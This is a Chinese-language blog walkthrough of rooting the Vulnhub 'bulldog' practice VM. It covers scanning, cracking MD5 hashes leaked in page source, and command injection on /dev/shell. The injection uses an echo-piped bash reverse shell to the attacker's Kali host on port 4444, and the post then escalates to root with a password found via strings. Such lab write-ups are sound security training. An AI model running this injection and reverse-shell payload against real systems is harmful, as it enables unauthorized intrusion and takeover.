目录

  • 前言
  • 一、bulldog靶机安装
  • 二、bulldog靶机渗透
    • 1、信息搜集
    • 2、Web渗透--后台登录
    • 3、Web渗透--命令注入&nc反弹shell
    • 4、权限提升
  • 渗透步骤回顾
  • 感悟

前言

bulldog靶机的渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。
参考博客:
https://blog.csdn.net/Eastmount/article/details/106066009
https://blog.csdn.net/qq_38684504/article/details/89706775
https://www.lagou.com/lgeduarticle/38714.html


一、bulldog靶机安装

靶场地址 :https://www.vulnhub.com/entry/bulldog-1%2C211/

靶机安装 :https://download.vulnhub.com/bulldog/

渗透目标 :拿到靶机root权限,看到祝贺信息

1、下载靶机bulldog 。
2、将靶机放到你想存放的地方,然后用VMware–文件–打开–点击导入。
3、导入的时候可能出现“未通过OVF规范一致性或虚拟硬件合规性检查”,请单击“重试”导入即可。
4、保证bulldog和kali在同一个局域网内(这里方法有很多),我采用的是bulldog和kali都修改网络适配器为NAT模式(bulldog默认是桥接模式)。
5、然后点击开启bulldog虚拟机(开启放着就好,不需要其他操作)

问题
1、bulldog开启的时候为什么没有显示ip地址?
答:有的博主做的时候显示了ip地址,有的博主没有显示,可能和bulldog的版本有关系,这里不影响渗透,如果没有显示ip,而且通过kali扫描的时候也没有扫描到bulldog主机的ip,那么可能是配置问题,需要设置一下。
2、kali扫描不到bulldog主机ip该如何设置?
答:

【1】重新启动bulldog,到开机页面选择第二个Ubuntu的高级选项。
【2】进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。

【3】选择root一行回车,进入命令行模式。

【4】输入 mount -o rw,remount /
【5】输入 ifconfig -a (查看网卡名称)

【6】输入 vim /etc/network/interfaces ,修改网卡名称成【5】步骤查询的结果,保存。

【7】输入 reboot 重启。
完成后大概长这样:(我也没有显示ip)

二、bulldog靶机渗透

我的设备信息如下:
物理机:win10
kali(NAT):ip 192.168.245.133
bulldog(NAT):ip 192.168.245.136

1、信息搜集

1.1 主机发现
得到目标靶机bulldog的ip:192.168.245.136/24

方法一:netdiscover -i eth0 -r 192.168.245.0/24
【-i】指定网卡设备
【-r】指定扫描网段
方法二:arp-scan -l

方法三:nmap -sP 192.168.245.0/24 【直接扫描C段】
【-sP】发现扫描网络存活主机。(直连arp非直连tcp80 icmp)

1.2 端口扫描

得到端口,版本,操作系统等信息

【端口扫描】nmap -sS -T4 -A -p- 192.168.245.136
-sS:半开扫描,记入系统日志风险小
-sP:扫描端口前,先使用ping扫描,保证主机存活
-A:全面系统检测,启用脚本检测和扫描

发现开放80,8080,23端口

【操作系统扫描】namp -O 192.168.245.136
【端口测试】nc -nv 192.168.245.136


尝试远程连接23端口后失败。

1.3 目录扫描
主机访问192.168.245.136:80

方法一:dirb http://192.168.245.136

方法二:dirsearch.py -u http://192.168.245.136 -e *

得到如下目录,然后挨个访问
http://192.168.245.136/admin/
http://192.168.245.136/dev/
http://192.168.245.136/admin/auth/
http://192.168.245.136/admin/login/
http://192.168.245.136/admin/logout/
http://192.168.245.136/dev/shell/

发现admin登录界面需要登录,dev可以访问,但是dev/shell 无法访问

尝试万能密码失败

dev界面
dev界面F12查看器查看,发现疑似哈希密码串
dev查看源码,效果和查看器一样
dev/shell不能访问

2、Web渗透–后台登录

上面发现dev页面隐藏一些疑似哈希的密码串,于是想撞撞哈希值
撞md5常用网址:
https://www.cmd5.com/
https://www.somd5.com/

查询成功但是付费???果断换网址
所有结果汇总:
正好是最后两个,猜测这两个一个是用户名一个是密码然后登录

打脸不要太快

回到dev界面,发现每个邮箱都是XXX@yyyyyyy.com 的格式,前面XXX看着高度可疑,于是用最后两个 nick 和 sarah 以及 bulldog和bulldoglover 两两组合用户名和密码尝试,发现 nick 对应 bulldog,sarah 对应 bulldoglover登录成功!

但是,没有一点权限。(那我为啥费劲登上来????)

不过,登录成功之后dev/shell可以访问了

里面列出的几个命令都是可以操作的


3、Web渗透–命令注入&nc反弹shell

dev/shell页面可以访问,但是只有几个命令,有过滤,下面开始想办法绕过过滤,尝试能不能反弹shell

|,&,&&,都可以绕过

这里有大佬想出用echo命令打包的方式绕过,由于我菜,就用他的方法了

首先:本地kali用nc监听一个端口,这里随便设置4444端口
nc -lvp 4444
然后:尝试反弹:bash -i >& /dev/tcp/192.168.245.133/4444 0>&1,报错【中间是kali的ip】

用echo打包再试:echo ‘bash -i >& /dev/tcp/192.168.245.133/4444 0>&1’|bash
【echo命令是允许执行的,所以利用echo构建一个反弹shell的命令,然后用管道符给bash执行】

此时kali监听接收到反弹过来的shell
到这里我们已经进入了系统,但是权限还不是root,离变成root的目标还有距离,下一步就开始提权操作。

4、权限提升

切换成root用户是需要root用户的密码,所以我们这里主要目标是在有限的权限里面搜集到root的密码,然后完成提权。

首先查看/etc/passwd看用户,发现bulldogadmin用户,尝试cd到该目录底下找信息

进入bulldogadmin目录 ls -al 发现隐藏文件 .hiddenadmindirectory,进入并查看

进入.hiddenadmindirectory 发现 customPermissionApp和note两个文件
cat这两个文件没有发现什么有价值的信息

有大佬说可以利用strings查看可执行文件中的内容,赶紧试试(strings命令用来提取和显示非文本文件中的文本字符串)【受教了受教了】

标红的地方是可以之处,
猜测可能是密码,应为SUPER、 ulitimate、PASSWORD、youCANTget, 可以把他们连到一起正好是SUPERultimatePASSWORDyouCANTget,H是来混淆的,中间刚好有PASSWORD;

然后迫不及待的su -i 挨个试了一遍,发现没有一个对的

请教大佬发现,这里有个小技巧,可以用Python调用本地的shell实现,命令如下:
python -c ‘import pty; pty.spawn("/bin/bash")’
然后在切换root,密码是最长的那个SUPERultimatePASSWORDyouCANTget

成功拿到root权限

渗透步骤回顾

1、信息收集
目标IP探测 (arp-scan、netdiscover、nmap)
Nmap端口扫描,版本,操作系统扫描等
2、目录扫描
用dirb扫出了许多关键目录(admin和dev页面)
用dirsearch扫描出关键目录
3、敏感文件查找及网页访问
4、MD5破解(在线破解,多个网址试试)
仔细观察网页信息,该靶机主要在/dev目录处前端源码泄露了MD5密码信息
5、登录管理员账号,并在/dev/shell页面利用命令注入漏洞
6、命令注入和nc反弹shell
命令拼接(ls &&echo ‘bash -i >& /dev/tcp/192.168.245.133/4444 0>&1’|bash
nc反弹shell(kali机监听 nc -lvp 4444)
7、权限提升
找root权限用户,找敏感目录,文件
strings的使用
用Python调用本地的shell实现
sudo python -c ‘import pty; pty.spawn("/bin/bash")’
sudo su - root

感悟

越学越觉得自己菜,所以只能不断的学下去,这篇博客里面还有一些地方我自己都不大懂,后续会自己先弄明白,忙活了几个月找暑假实习,从内推到网申再到校招,这段时间没怎么写博客,算是偷懒了。不过找实习的过程还是学习了很多,从最开始接到面试电话吓得腿抖,到后面慢慢摸清了面试官的问题套路和面试官有说有笑,自己也算是进步了吧,当然会就是会不会就是不会,和面试官胡搅蛮缠是不行的。也慢慢觉得“自我”这种东西是碰撞出来的,越是碰到强的东西,凶狠的东西,高水准的东西就会反弹回来,虽然撞的鼻青脸肿,但是可以反馈给你自己的水平,让你知道人外有人天外有天,还需夹着尾巴学习,那就夹着尾巴好了,我是一个怀揣大佬梦想的菜鸡,不想当大佬的菜鸡不是好菜鸡!明天就要去上班实习了,实习单位还不错,算是业内一流水平,这会反而睡不着,忙活了这么久,六一节了心情开始忐忑,嗯,希望后面的路我能勇敢的走下去,给自己加加油。

by 久违 2020.6.1 凌晨

【渗透测试】靶机渗透Vulnhub-bulldog相关推荐

  1. 看完这篇 教你玩转渗透测试靶机vulnhub——DC9

    Vulnhub靶机DC9渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SQL注入: ③:文件包含: ④: ...

  2. 看完这篇 教你玩转渗透测试靶机vulnhub——DC1

    Vulnhub靶机DC1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:漏洞利用: ④:S ...

  3. 看完这篇 教你玩转渗透测试靶机vulnhub——DC3

    Vulnhub靶机DC3渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:SQL注入: ④: ...

  4. 看完这篇 教你玩转渗透测试靶机vulnhub——DC7

    Vulnhub靶机DC7渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH登入: ③:漏洞发现与利用: ...

  5. 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

    Vulnhub靶机My File Server: 2渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP ...

  6. 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 1

    Vulnhub靶机My File Server: 1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP ...

  7. 看完这篇 教你玩转渗透测试靶机vulnhub——MoneyBox: 1

    Vulnhub靶机MoneyBox: 1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP匿名登入: ...

  8. 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)

    Vulnhub靶机FunBox4(CTF)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:文件上传 Get ...

  9. 看完这篇 教你玩转渗透测试靶机vulnhub——Source:1

    Vulnhub靶机Source:1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:远程命令执行漏洞 CVE ...

  10. 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox3(Easy)

    Vulnhub靶机FunBox3(Easy)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:网站渗透Get ...

最新文章

  1. Java EE学习心得
  2. 《Offer一箩筐》2W字总结面试套路14问——不给例子的教程都是耍流氓!!
  3. v-on 事件监听器
  4. Java 中的位移运算符
  5. 3d需要学linux_我的脑子—从核磁共振图像到3D打印
  6. 不是架构的架构之四:业务层的实现与自动代理
  7. 什么是负边沿触发_用好示波器必须学会的知识:触发方式
  8. c++十进制转二进制_二进制与十进制相互转换的原理
  9. 索尼印度研究院启动运营 将在应用AI和数据分析领域提供就业机会
  10. 【Vue】—列表渲染v-for指令
  11. HDU #5733 tetrahedron
  12. 2010年度十大杰出IT博客大赛奖品展示
  13. python中string.digits_Python3基础:String模块ascii_letters和digits
  14. BT种子文件(.torrent)的具体文件结构
  15. 计算机电容与晶体管等硬件的作用,太实用了|开关电源中各元器件的命名与用途!-EDA365电子论坛通信数码-人工智能-计算机-半导体-手机家电消费电子硬件门户网站...
  16. 《管理的常识》3-“什么是组织结构”读后感及读书笔记
  17. 如何更改微信小程序二维码物料颜色
  18. 忘记 Apple ID 密码?重设 Apple ID 密码的 3 种方法
  19. c语言模拟抛骰子,c语言模拟抛1000000次骰子
  20. js密码生成器小工具

热门文章

  1. 【一起入门NLP】中科院自然语言处理期末考试*总复习*:考前押题+考后题目回忆
  2. leetcode 每天10道travl
  3. stl文件介绍及读取
  4. 解决word里没有Endnote加载项
  5. Pytorch----卷积神经网络(CNN,图像边缘检测 , Sobel滤波器 , Scharr滤波器)--入门级小实例(逐行注释)---学习笔记
  6. 塔夫茨计算机科学,塔夫茨大学计算机科学研究生语言及申请要求-费用-课程设置...
  7. DMS应用性能管理案例分析(二)
  8. unity转微信小程序小游戏
  9. 派森小镇(二)神奇能量药丸
  10. 递归函数c语言求爬格子,指标的含义,真或假.doc